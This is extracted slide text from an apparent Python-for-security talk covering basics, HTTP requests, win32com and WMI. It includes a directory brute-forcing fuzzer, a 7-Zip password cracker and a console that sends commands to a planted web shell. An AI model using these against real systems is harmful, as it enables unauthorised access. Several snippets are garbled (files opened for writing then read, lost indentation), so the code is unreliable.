2. Why?
™ EASY (install, learn, code)
™ Tons of libraries
™ Code is easy to understand
™ Multiplatform
™ Good for prototyping
3. History
™ Conceived in late 80´s and first implementation in 1989
™ Created by Guido Van Rossum
™ Benevolent Dictator for Life
™ Actually there are two branches 2.x and 3.0
4. Python 101
™ Interpreted language
™ Object oriented
™ Indentation is significant in Python, block delimiter.
™ Usual control structures (if, while, etc)
™ Multiple levels of organization (function, classes, modules,
packages)
5. Who is using Python?
™ Core Impact ™ ImmunityDebugger
™ Canvas ™ Peach
™ W3AF ™ Sulley
™ Sqlmap ™ Paimei
™ Impacket ™ Scapy
™ Google ™ Spike Proxy
9. Python 101
™ Interactive python shell
™ The commands execute line per line as you type
™ Good for testing small pieces of code as loops, regex,
etc
™ Type “python” and enter to access the shell
10. Python 101
™ Strings starts counting in 0 and can have also negative
indexes
™ msg[0] is H
™ msg[-1] is d
11. Basic Code bits
import sys
ofile = ”names.txt”
fil = open(ofile,'w’)
x = fil.readlines()
for y in x:
print y
12. Urllib2
™ Library to deal with HTTP
import urllib2
response = urllib2.urlopen('http://python.org/')
html = response.read()
print html
13. Basic fuzzer
import sys, urllib2
ofile = ”dirs.txt”
fil = open(ofile,'w')
dirs = fil.readlines()
for x in dirs:
response = urllib2.urlopen('http://python.org/’+x)
html = response.read()
15. Generic Console for Web
Remote Execution
import httplib, urllib, sys
host=”XXXXXXXXXX”
while 1:
cmd=raw_input("Exploited@"+host+"#>")
if cmd=="exit":
sys.exit()
else:
h = httplib.HTTP(host)
cmd=urllib.quote(cmd)
print cmd
h.putrequest('GET',”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd)
h.putheader('Host', host)
h.putheader('User-agent', 'Internet Explorer 6.0 ')
h.endheaders()
returncode, returnmsg, headers = h.getreply()
16. 7 Zip Cracker
import os, sys, pylzma
from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError
pas = open('passwords.txt', 'rb')
password=pas.readlines()
for x in password:
try:
fp = open('test.7z', 'rb')
archive = Archive7z(fp, password=x)
print ”The password is" + x
sys.exit()
except Exception, e:
fp.close()
17. A Web browser
#!/usr/bin/env python
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
app = QApplication(sys.argv)
web = QWebView()
web.load(QUrl("http://www.edge-security.com"))
web.show()
sys.exit(app.exec_())
23. Win32Com
™ Library that allows us to access COM objects in Win32
systems
™ We can automate Word, Excel, Powerpoint, access
WMI, AD, etc
24. Massive printing
from win32com import client
import time
word = client.Dispatch("Word.Application”)
def printPDFDocument(filename):
word.Documents.Open(filename)
word.ActiveDocument.PrintOut()
time.sleep(5)
word.ActiveDocument.Close()
word.Quit()
printPDFDocument("c:test.doc")
25. Excel Processing
from win32com.client import Dispatch
xlApp = Dispatch("Excel.Application")
xlApp.Visible = 1
xlApp.Workbooks.open("test.xls")
for x in range(1,100):
nombre=str(xlApp.ActiveSheet.Cells(x,5))
print nombre
xlApp.Quit()
26. WMI
import wmi
c = wmi.WMI ()
for process in c.Win32_Process ():
print process.ProcessId, process.Name